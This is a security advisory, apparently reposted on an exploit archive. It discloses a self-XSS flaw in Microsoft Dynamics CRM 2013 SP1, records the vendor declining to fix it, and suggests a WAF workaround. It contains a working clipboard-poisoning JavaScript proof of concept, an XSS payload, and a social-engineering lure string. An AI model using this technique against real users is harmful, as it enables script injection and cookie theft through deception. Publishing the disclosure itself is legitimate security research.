exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Dynamics CRM 2013 SP1 Cross Site Scripting

Microsoft Dynamics CRM 2013 SP1 Cross Site Scripting
Posted Jan 7, 2015
Authored by High-Tech Bridge SA | Site htbridge.com

Microsoft Dynamics CRM 2013 SP1 suffers from self-inflicted cross site scripting vulnerability.

tags | exploit, xss
SHA-256 | 41e6f08ded3f571f338d58545a450ed803a63a8d8b352fe3850ccd7918e8dbf6

Microsoft Dynamics CRM 2013 SP1 Cross Site Scripting

Change Mirror Download
Advisory ID: HTB23245
Product: Microsoft Dynamics CRM 2013 SP1
Vendor: Microsoft Corporation
Vulnerable Version(s): (6.1.1.132) (DB 6.1.1.132) and probably prior
Tested Version: (6.1.1.132) (DB 6.1.1.132)
Advisory Publication: December 29, 2014 [without technical details]
Vendor Notification: December 29, 2014
Public Disclosure: January 7, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered a DOM-based self-XSS vulnerability in Microsoft Dynamics CRM 2013 SP1, which can be exploited to perform Cross-Site Scripting attacks against authenticated users.

The vulnerability exists due to insufficient filtration of user-supplied input passed to the "/Biz/Users/AddUsers/SelectUsersPage.aspx" script after an unsuccessful attempt to send XML SOAP request. A remote attacker can trick a logged-in user to insert malicious HTML and script code into the "newUsers_ledit" input field and execute it in user’s browser in context of vulnerable web application.

To successfully exploit this vulnerability (as any other XSS vulnerability, besides stored ones) an attacker should use a social engineering technique to trick the user to insert malicious code into the above-mentioned field on the vulnerable page. Being a self-XSS, the vulnerability still remains quite useful to perform attacks against users of Microsoft Dynamics CRM that is quite secure. Below you can find the exploitation scenario applicable to any web application running Microsoft Dynamics CRM.

Using pretty simple social engineering technique attacker can trick a user to copy some "legitimate" text from a specially prepared malicious page to user's clipboard using "Ctrl+C" or mouse, and then paste it into the vulnerable web page.

Simple exploit code bellow will display a legitimate text to the user, and then replace the text in user's clipboard with our exploit code:


<script>
// simple exploit to poison clipboard
function replaceBuffer() {
var selection = window.getSelection(),
eviltext = '1<img src=x onerror=alert("ImmuniWeb") />',
copytext = eviltext,
newdiv = document.createElement('div');
newdiv.style.position = 'absolute';
newdiv.style.left = '-99999px';
document.body.appendChild(newdiv);
newdiv.innerHTML = copytext;
selection.selectAllChildren(newdiv);
window.setTimeout(function () {
document.body.removeChild(newdiv);
}, 100);
}
document.addEventListener('copy', replaceBuffer);
</script>
In order to find hidden users just copy this string into the search window:
HIDDEN USERS&&DISPLAY


The victim will see the following text in the browser:

HIDDEN USERS&&DISPLAY


However, will copy and paste the following malicious payload:

1<img src=x onerror=alert("ImmuniWeb")>


Attacker then can trick then the user to paste copied buffer into the "newUsers_ledit" field on the "https://[victim_host]/[site]/Biz/Users/AddUsers/SelectUsersPage.aspx" page and the JS code will be executed in context of the vulnerable website.

Below you can see the image with user cookies displayed in JS pop-up:
https://www.htbridge.com/advisory/HTB23245.png

Quick video of exploitation:
https://www.youtube.com/watch?v=yS-eS_qWgUI



-----------------------------------------------------------------------------------------------

Solution:

On the 31st of December 2014, Microsoft replied the following:

"MSRC does not consider self-XSS issues to be security vulnerabilities. For a discussion of how we define security vulnerabilities, see https://www.microsoft.com/technet/archive/community/columns/security/essays/vulnrbl.mspx "

Taking into consideration the rise of successful self-XSS attacks campaigns in 2014 we do consider this issue to be a security vulnerability. As vendor refused to provide an official fix for the vulnerability, we suggest to block access to the vulnerable script using WAF or web server configuration as a temporary solution.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23245 - https://www.htbridge.com/advisory/HTB23245 - Self-XSS in Microsoft Dynamics CRM 2013 SP1.
[2] Microsoft Dynamics CRM 2013 - https://www.microsoft.com/en-us/dynamics/crm.aspx - Microsoft Dynamics CRM is our customer relationship management (CRM) business solution that drives sales productivity and marketing effectiveness through social insights, business intelligence, and campaign management in the cloud, on-premises, or with a hybrid combination.
[3] Common Weakness Enumeration (CWE) - https://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[4] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    69 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close